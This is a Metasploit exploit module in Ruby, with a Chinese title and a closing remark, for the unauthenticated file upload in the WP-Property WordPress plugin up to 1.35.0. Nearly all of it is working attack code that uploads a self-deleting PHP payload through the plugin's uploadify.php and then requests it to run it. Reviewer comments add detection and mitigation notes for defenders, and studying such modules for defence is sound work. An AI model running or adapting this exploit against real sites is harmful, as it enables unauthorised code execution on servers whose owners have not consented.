WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

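# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# Reviewer notes for defenders, derived from the requests this module sends:
# - The upload is a multipart POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php with
#   the form fields "Filedata" and "folder"; no cookie or credential is set.
# - It is followed by a GET for whatever path the server returned in the
#   upload response; the file name is five random letters plus ".php".
# - The payload is built with :unlink_self, so the uploaded file is presumably
#   removed once it runs. Web server access logs are therefore better
#   evidence than the contents of the upload directory.
# - Mitigation: update the plugin past the affected versions, remove or block
#   the bundled uploadify.php, and deny PHP execution in upload directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, disclosure date) and
  # the single TARGETURI option that points at the WordPress base path.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Reports whether the plugin's uploadify.php endpoint is reachable.
  #
  # This is a presence test only: any HTTP 200 for the script path yields
  # "Appears". The plugin version is never read, so a patched install that
  # still ships the file is reported the same way as a vulnerable one.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    # No response or a non-200 status says nothing either way.
    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads the generated PHP payload through uploadify.php and then requests
  # the path returned by the server.
  #
  # The multipart body carries the file as "Filedata" and the destination
  # directory as "folder". The module fails with UnexpectedReply unless the
  # upload response is a 200 whose body mentions the chosen file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strips the CRLF in front of a boundary line at the start of a line of the serialized message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # NOTE(review): the file name is interpolated into the regex unescaped,
    # so the "." before "php" matches any character.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

end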

不要问我这写的是什么 怎么利用 我是说msf.